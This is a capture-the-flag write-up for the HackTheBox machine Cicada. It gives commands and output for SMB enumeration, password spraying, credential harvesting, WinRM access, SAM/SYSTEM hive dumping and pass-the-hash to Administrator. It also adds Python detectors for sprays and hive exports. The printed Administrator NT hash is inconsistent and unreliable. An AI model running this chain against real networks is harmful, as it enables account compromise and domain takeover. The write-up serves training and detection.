HackTheBox | Cicada
In this writeup, I demonstrate how to gain administrator level access to Cicada on HackTheBox.


Reconnaissance
Started off with an Nmap scan and specified the following options:
- -sC to use default scripts
- -sV to gather service/version information
- -oA to save the output to a file
- -p- to scan all TCP ports
The scan results suggest that the host is Windows-based. It is running SMB on TCP ports 139 and 445. It also runs LDAP/LDAPS and Kerberos on TCP ports 389/636 and 88, respectively. These services are usually seen on domain controllers. Finally, WinRM is also running on TCP port 5985.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ sudo nmap -sC -sV -oA nmap/full.tcp -p- 10.129.82.46
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 14:01 CST
Nmap scan report for 10.129.82.46
Host is up (0.0080s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-23 03:03:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2024-11-23T03:04:24
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 231.74 seconds
Initial Access
Abusing Null Sessions and Poor Password Policies
To gather more information about the system, I ran the following command. The command results revealed that the system supports null sessions, but RPC queries for users/groups were denied. Considering that, it was time to pivot to shares and enumerate those. A couple of non-standard shares looked promising, but only one could have the contents of its directory listed. That share had a fascinating text document.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A 10.129.82.46
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass -L 10.129.82.46
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.82.46 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass //10.129.82.46/DEV
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient --no-pass //10.129.82.46/HR
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 430240 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (35.3 KiloBytes/sec) (average 35.3 KiloBytes/sec)
smb: \> exit
The text document is related to the company's onboarding process and contains directions for employees accessing their accounts using a default password. And like any good company with proper security protocols, it directs its employees to change their passwords to something unique after logging in for the first time. Surely all the employees followed the directions, so a password-spraying attack would not work... or would it?
I generated a list of usernames by performing RID brute-forcing via netexec and selected user SIDs only. With a password and a list of usernames, it was time to spray and pray. Just like that, I discovered valid user credentials. I did not know what type of access michael.wrightson had. Because of that, it is good practice to go back to the enumeration phase and see what new information can be gathered from the environment. Fortunately, michael.wrightson can query users/groups via RPC. In the description field for david.orelious is his password, just in case he forgets it. I enumerated the system again with david.orelious's credentials. It turns out he has access to the DEV share. On that share was a PowerShell script with hard-coded credentials for emily.oscars.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -u guest -p '' --rid-brute | egrep "SidTypeUser"
SMB 10.129.82.46 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.82.46 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -u guest -p '' --rid-brute | egrep "SidTypeUser" \
> | cut -d '\' -f2 | cut -d '(' -f1
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ netexec smb 10.129.82.46 -d CICADA -p pw.txt -u users.txt | egrep '\+' | cut -d ":" -f1
SMB 10.129.82.46 445 CICADA-DC [+] CICADA\michael.wrightson
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A -u michael.wrightson -p $(cat pw.txt) 10.129.82.46
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ enum4linux -A -u david.orelious -p $(cat pw.txt) 10.129.82.46
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ smbclient -U CICADA/david.orelious%"$(cat pw.txt)" //10.129.82.46/Dev
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 07:31:39 2024
.. D 0 Thu Mar 14 07:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 12:28:22 2024
4168447 blocks of size 4096. 427257 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (17.3 KiloBytes/sec) (average 17.3 KiloBytes/sec)
smb: \> exit
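The spray described above leaves a characteristic trace in the domain controller's Security log: one source address producing failed logons (Event ID 4625) for many distinct accounts within a short window, often with a single success (4624) among them. The following Python is an added detection example, not part of this writeup; the events it runs on are constructed sample data reusing the account names and tester address from the transcript, and the thresholds (`window_seconds`, `min_accounts`) are assumptions to tune per environment.

```python
"""Password-spray detection over Windows Security log events (added example)."""
from collections import defaultdict
from datetime import datetime

# Constructed sample events: (timestamp, event_id, account, source_ip).
# 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = [
    ("2024-11-23T03:10:01", 4625, "john.smoulder", "10.10.14.150"),
    ("2024-11-23T03:10:02", 4625, "sarah.dantelia", "10.10.14.150"),
    ("2024-11-23T03:10:02", 4624, "michael.wrightson", "10.10.14.150"),
    ("2024-11-23T03:10:03", 4625, "david.orelious", "10.10.14.150"),
    ("2024-11-23T03:10:03", 4625, "emily.oscars", "10.10.14.150"),
    # A workstation user mistyping a password once: must not alert.
    ("2024-11-23T03:11:40", 4625, "sarah.dantelia", "10.10.20.7"),
    ("2024-11-23T03:11:55", 4624, "sarah.dantelia", "10.10.20.7"),
]


def detect_spray(events, window_seconds=300, min_accounts=4):
    """Return {source_ip: {"accounts": [...], "successes": [...]}}.

    A source is flagged when it fails logons for at least `min_accounts`
    distinct accounts inside a sliding window of `window_seconds`; any
    successful logon from the same source inside that window is reported
    as the likely hit. Thresholds are assumptions; tune them per environment.
    """
    by_src = defaultdict(list)
    for ts, eid, acct, src in events:
        by_src[src].append((datetime.fromisoformat(ts), eid, acct.lower()))

    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        failures = [(t, a) for t, e, a in evs if e == 4625]
        start = 0
        for end in range(len(failures)):
            # Shrink the window from the left until it fits window_seconds.
            while (failures[end][0] - failures[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = {a for _, a in failures[start:end + 1]}
            if len(distinct) >= min_accounts:
                t0, t1 = failures[start][0], failures[end][0]
                hits = sorted({a for t, e, a in evs if e == 4624 and t0 <= t <= t1})
                alerts[src] = {"accounts": sorted(distinct), "successes": hits}
                break
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {src}: {len(info['accounts'])} accounts, "
              f"successes={info['successes']}")
```

A slow spray that spaces attempts out over hours will slip under a five-minute window, so a production rule should also aggregate per source over a day and correlate with Kerberos pre-authentication failures (4771) and NTLM validation failures (4776), which capture the same activity from the authentication side. The underlying fix on this box is the policy one: a shared default password that employees are merely asked to change, plus guest-accessible shares that expose the onboarding notice, is what makes the spray cheap.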
Based on the backup script, I assumed emily.oscars is a system administrator. Sometimes, system administrators need to access remote hosts. There are many tools out there that provide this type of functionality. In a Windows environment, however, there is a native tool that allows system administrators to access and control devices remotely. That tool is known as PowerShell remoting, which relies on WinRM. During my initial enumeration of the target system, it showed that the WinRM service was running on TCP port 5985. Utilizing the credentials from the PowerShell script, it was possible to get code execution on the target.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ evil-winrm -i 10.129.82.46 -u emily.oscars -p $(cat pw.txt)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> hostname
CICADA-DC
Privilege Escalation
Abusing Group Membership Permissions
With a foothold established on the target system, I started to gain some situational awareness. After doing so, one might notice that the user emily.oscars is part of a unique group - BUILTIN\Backup Operators.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
...SNIP...
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
...SNIP...
Membership in the BUILTIN\Backup Operators group grants SeBackupPrivilege, and once that privilege is enabled a user can create a backup of ANY file on the host regardless of its ACL. With that in mind, it is possible to back up the SAM and SYSTEM hives and extract credentials for local system accounts.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir
Directory: C:\Users\emily.oscars.CICADA\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/23/2024 2:21 AM 49152 sam
-a---- 11/23/2024 2:21 AM 18558976 system
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!
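From a detection standpoint, the hive export above is visible as process creation (Security Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1): reg.exe saving the SAM, SYSTEM or SECURITY hive, spawned under wsmprovhost.exe because the session came in over WinRM. The Python below is an added example, not from this writeup; the process events are constructed, and the field names and the list of remote-shell parent processes are assumptions about how such logs are exported.

```python
"""Flag registry hive exports in process-creation events (added example)."""
import re

# reg save / reg export of a credential-bearing hive under HKLM.
HIVE_EXPORT = re.compile(
    r"\breg(?:\.exe)?\s+(?:save|export)\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b",
    re.IGNORECASE,
)
# Parent processes that indicate an interactive remote session (assumption:
# wsmprovhost.exe hosts WinRM / PowerShell remoting sessions).
REMOTE_SHELL_PARENTS = {"wsmprovhost.exe"}

# Constructed sample events in the shape of a 4688 / Sysmon-1 export.
SAMPLE_EVENTS = [
    {"user": r"CICADA\emily.oscars", "parent": "wsmprovhost.exe",
     "cmd": r"reg save hklm\sam sam"},
    {"user": r"CICADA\emily.oscars", "parent": "wsmprovhost.exe",
     "cmd": r"reg  save HKLM\SYSTEM system"},
    # Legitimate export of an application hive: not a secrets hive, no alert.
    {"user": r"CICADA\svc_backup", "parent": "services.exe",
     "cmd": r"reg save hklm\software\contoso app.hiv"},
    # Read-only query, no export: no alert.
    {"user": r"CICADA\john.smoulder", "parent": "explorer.exe",
     "cmd": r"reg query hklm\sam"},
]


def flag_hive_exports(events):
    """Return one finding per event whose command line exports SAM/SYSTEM/SECURITY.

    Each finding records the user, the hive, and whether the parent process
    indicates the command ran inside a remote shell session.
    """
    findings = []
    for ev in events:
        match = HIVE_EXPORT.search(ev["cmd"])
        if not match:
            continue
        findings.append({
            "user": ev["user"],
            "hive": match.group(1).upper(),
            "remote_session": ev["parent"].lower() in REMOTE_SHELL_PARENTS,
        })
    return findings


if __name__ == "__main__":
    for f in flag_hive_exports(SAMPLE_EVENTS):
        where = "over a remote session" if f["remote_session"] else "locally"
        print(f"ALERT: {f['user']} exported the {f['hive']} hive {where}")
```

Command-line auditing must be switched on for 4688 to carry the command line at all; without it only the image name reg.exe is logged, which is far too noisy on its own. The same event source also shows who holds the privilege in the first place: on a domain controller, membership in Backup Operators should be reviewed regularly, because as the transcript shows the group is effectively a path to the local Administrator hash.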
After extracting the hashes from the downloaded hives with pypykatz, the local Administrator's NT hash can be used to authenticate over WinRM (pass-the-hash) and elevate privileges.
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ ls -latr sam system
-rw-r--r-- 1 htb-mp-1386836 htb-mp-1386836 49152 Nov 22 21:21 sam
-rw-r--r-- 1 htb-mp-1386836 htb-mp-1386836 18558976 Nov 22 21:22 system
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee:::
┌─[us-dedivip-1]─[10.10.14.150]─[htb-mp-1386836@htb-yizp2jkxqx]─[~/Cicada]
└──╼ [★]$ evil-winrm -i 10.129.82.46 -u administrator -H $(cat admin_hash.txt)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
References
- Windows Server Service Overview and Network Port Requirements - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/service-overview-and-network-port-requirements
- Backup Operator Privilege Escalation - https://www.bordergate.co.uk/backup-operator-privilege-escalation/